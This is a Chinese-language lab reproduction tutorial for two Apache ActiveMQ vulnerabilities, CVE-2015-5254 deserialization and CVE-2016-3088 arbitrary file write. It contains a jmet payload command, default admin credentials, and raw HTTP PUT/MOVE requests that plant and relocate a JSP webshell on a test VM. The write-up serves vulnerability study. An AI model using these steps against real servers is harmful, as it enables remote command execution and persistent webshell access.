漏洞描述
环境准备
系统环境:linux 虚拟机 centos 64位(不再赘述搭建过程)
应用环境:jdk 7、ActiveMQ 5.11.0(主讲)
工具环境:burpsuite、cmd、dnslog、jmet
后面我们会提供官网下载地址,如果大家觉得官网下载太慢,可以使用我们的打包好的环境:https://pan.baidu.com/s/1o-EPKYNbP9BgoPj6_0JOeQ
提取码:vvoz
jdk 7 环境在 linux 中的搭建:
官网下载:https://www.oracle.com/java/technologies/javase/javase7-archive-downloads.html#jdk-7u80-oth-JPR
[root@localhost usr]# tar xf jdk7u79linuxx64.tar.gz
[root@localhost usr]# mv jdk1.7.0_79/ jdk7
[root@localhost usr]# vi /etc/profile
//最后一行增加如下代码,JAVA_HOME为之前jdk解压目录
export JAVA_HOME=/usr/jdk7
export CLASSPATH=.:$JAVA_HOME/jre/lib/rt.jar:$JAVA_HOME/lib/dt.jar:$JAVA_HOME/lib/tools.jar
export PATH=$PATH:$JAVA_HOME/bin
[root@localhost usr]# source /etc/profile
[root@localhost usr]# java -version
java version "1.7.0_79"
Java(TM) SE Runtime Environment (build 1.7.0_79-b15)
Java HotSpot(TM) 64-Bit Server VM (build 24.79-b02, mixed mode)
ActiveMQ 的搭建:
官网下载:http://activemq.apache.org/download-archives
[ ]
[ ]
[ ]
//8161为ActiveMQ的默认web管理端口
漏洞复现
ActiveMQ反序列化漏洞(CVE-2015-5254):
首先下载jmet(环境包中包含),jmet下载地址:https://github.com/matthiaskaiser/jmet/releases
在jmet-0.1.0-all.jar同级目录下创建“external”文件夹防止报错,然后使用jmet构造event事件
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "payload" -Yp ROME 192.168.0.119 61616
这里的payload替换为执行的命令
访问:
http://192.168.0.119:8161/admin/browse.jsp?JMSDestination=even
默认账密为:admin/admin
登录后查看消息
这时候去dnslog平台查看是否执行命令成功
至此ActiveMQ反序列化漏洞(CVE-2015-5254)复现成功。
任意文件写入漏洞(CVE-2016-3088):
首先我们先上传一个TXT格式的webshell
PUT /fileserver/shell.txt HTTP/1.1
Host: 192.168.0.119:8161(注意修改地址)
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (IB test)
Connection: close
Content-Length: 120976
webshell...(这里替换为自己的webshell)
验证上传 http://192.168.0.119:8161/fileserver/shell.txt
信息泄露 http://192.168.0.119:8161/admin/test/systemProperties.jsp
将之前上传的webshell转移到可以执行的api目录
MOVE /fileserver/shell.txt HTTP/1.1
Destination: file:///usr/activemq/webapps/api/shell.jsp
Host: 192.168.0.119:8161
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (test)
Connection: close
Content-Length: 0
至此任意文件写入漏洞(CVE-2016-3088)复现成功。
点个赞
再走吧
原文始发于微信公众号(安全小圈圈):复现:Apache ActiveMQ反序列化漏洞(CVE-2015-5254)和任意文件写入漏洞(CVE-2016-3088)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论